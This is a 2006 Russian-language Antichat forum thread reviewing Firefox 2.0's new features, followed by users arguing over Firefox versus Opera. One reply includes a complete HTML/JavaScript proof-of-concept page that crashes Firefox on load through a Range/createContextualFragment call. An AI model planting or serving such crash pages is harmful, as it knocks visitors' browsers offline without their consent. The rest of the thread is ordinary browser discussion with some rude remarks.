Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Firefox 2.0 (маленький обзор нового браузера ) |

13.11.2006, 20:07
|
|
Познающий
Провел на форуме: 283036
|
|
Firefox 2.0 (маленький обзор нового браузера )
Firefox 2.0 (Вышел 24 октября 2006 года.)
Не сказать, что релиз Firefox 2.0 стал большой неожиданностью. Даже список нововедений был известен задолго до дня выхода финальной версии. Так что единственный вопрос теперь: переходить на новую версию или продолжить испльзовать - более ранний "Фокс", Opera или Internet Explorer. Последний, правда, тоже не так давно обновился, и его возможности вплотную подошли к возможностям "огненной лисицы".
Взглянем ещё раз на те немногие новшества, которыми в Mozilla решили порадовать сообщесто пользователей "Фокса" и сманить поклонников других браузеров. Первым делом в списке новшеств упоминается обновлённая визуальная тема.
Вот скрин нашел на одном из сайтов:
Второй предмет гордости Mozilla - это безопасность. В первую очередь, за этим словом скрывается встроенный в Firefox 2.0 антифишинговый модуль, созданный на базе технологии Google. Если в окне браузера вдруг окажется открыт сайт, помеченный "Гуглом" как поддельный, в адресной строке появится значок предупреждения. Свойство, безусловно, полезное, но всецело доверять "чёрным спискам" не стоит. По крайней мере, потому что всецело положившись на них, можно угодить впросак, доверив свою информацию поддельному сайту, который Google ещё не успел добавить в свой "расстрельный список".
Впрочем, есть ряд технических новшеств, которые нельзя не охарактеризовать положительно. Возможность восстановления вкладок после закрытия браузера (как намеренного, так и вследствие сбоя), редактор списка поисковиков и их добавление через OpenSearch, отображение предполагаемых запросов под строкой поиска (среди них и предыдущие запросы, и запросы других пользователей), поддержка JavaScript 1.7 и SVG text.
Необходимость модуля проверки правописания, перекочевавшего из Thunderbird, вызвает уже некоторые сомнения. Дело в том, что создатели Firefox всячески стараются избегать включения в дистрибутив любых вещей, не относящихся напрямую к просмотру веб-страниц. Именно по этим причинам, ктстати, вместо полнофункционального средства чтения RSS в браузер добавили лишь простенький агрегатор, отображающий в наглядном виде содержимое канала: об этом подробно рассказывает в интервью сайту readwriteweb.com (интервью на английском  ) Крис Бирд - вице-президент Mozilla Foundation.
В том же интервью он объясняет, почему этот релиз Firefox удостоился индекса 2.0. Говорит, что это обусловлено, в основном, тем, что разработчики считают именно этот релиз наиболее цельным и готовым для представления широкой публике. Что ж, поверим ему на слово.
Скачать Firefox 2.0 можно на http://www.mozilla.ru/
Сразу заранее приношу извинения если уже было( .
Также хотелось бы узнать мнение Експертов Античата ? Что они думают о етом браузере?
Последний раз редактировалось Серый; 21.11.2006 в 19:43..
|
|
|

13.11.2006, 23:26
|
|
Banned
Провел на форуме: 10759
|
|
Дурак ты!!! Опера намного лутше... и причом здесь мазила ты посмотри в поиск ачата там много инфы намного полезнишой чем твоя!.. твоя стаття косит под глупого ламера.
А вобше незнаю зачем ты создал ету тему..
Бля и за чем в мире столько уродов есть.. которые пишут а потом разбераются что наделали...
Мой тебе совет стри пост и иди детей балуй..
|
|
|

14.11.2006, 00:01
|
|
Banned
Провел на форуме: 1941233
|
|
не нашел в опере ничего кроме багов невылезания из процессов после закрытия окна,
лишней красивости, невозможности зачастую нормально обновить страницу,
а также невозможности явно выбрать тип используемого сокса.
причем при использовании FreeCap опера падает с ошибкой...
может опера и лучший (ничего незначащее слово) браузер, но эффективнейший и удобнейший - firefox
|
|
|

14.11.2006, 00:08
|
|
Постоянный
Провел на форуме: 3465924
|
|
Вот такие как shoot mc и раздражают лично меня...
Какое право ты имеешь оскорблять человека за то, что ему всего-лишь нравится не то, что нравится тебе...
Признаюсь...мне тоже больше по душе firefox, ежели чем опера, что, дурак значит я?...
Не слышал про такие слова, мол на вкус и цвет товарищей нет?
Тут также...
Мдя уж...
|
|
|

14.11.2006, 09:29
|
|
Pagan Heart
Провел на форуме: 6490435
|
|
Дурак ты!!! Опера намного лутше...
Сам ты дурак ) Забаненный по дыум пунктам ) Оскорбление и навязывание своего неправильного мнения.
|
|
|

14.11.2006, 11:42
|
|
Познающий
Провел на форуме: 219818
|
|
Ага, а еще надо ездить только на джипах, покупать только телики LG, есть в Макдональдсе. Остальное все отстой, даю установку: остальное отстой...
А вообще конечно может и ругают ФФ за то что багов много, но лично мне нравится ее расширяемость и количество плагинов. Ее действительно можно настроить под себя.
shoot mc -
|
|
|

14.11.2006, 12:22
|
|
Заведующий всем
Провел на форуме: 5957900
|
|
Что в лисе нравиться, так это куча полезных add-ons. Другими словами - собери себе браузер сам.
А баги ведь в нем находили уже, но зашёл как-то на POC какой-то, noscript сказал ему гудбай.
|
|
|

14.11.2006, 12:54
|
|
Постоянный
Провел на форуме: 3730496
|
|
В файрфоксе бесят 2 вещи: полный рефреш страницы после нажатия на "Back" и размер бинарника ~ 7метров. Portable версия Оперы (Opera@USB 9.02) вполне устраивает - привык наверное.
|
|
|

14.11.2006, 13:23
|
|
Постоянный
Провел на форуме: 1593567
|
|
Ладно если ты просиш моё личное мнение то я его скажу.
Я сильно люблю FireFox и я его юзаю уже год.
Но к сожелению в последнии дни в нём нашли еще один сплойт, который делает DoS, поэтому я недавно установил себе оперу, и пока не жалею
Вот сплойт:
PHP код:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>
|
|
|

14.11.2006, 13:33
|
|
Участник форума
Провел на форуме: 2630617
|
|
Ну скажу я пользуюсь 3 браузерами
1. ИЕ
2. Opera
3. mozilla
-ИЕ использую в поисках хсс
-Опера когда инет лагает
-мозила бравзер очень безопасный и им пользуюсь почти всегда!
+за обзор о мозиле.)
|
|
|
|
 |
|
|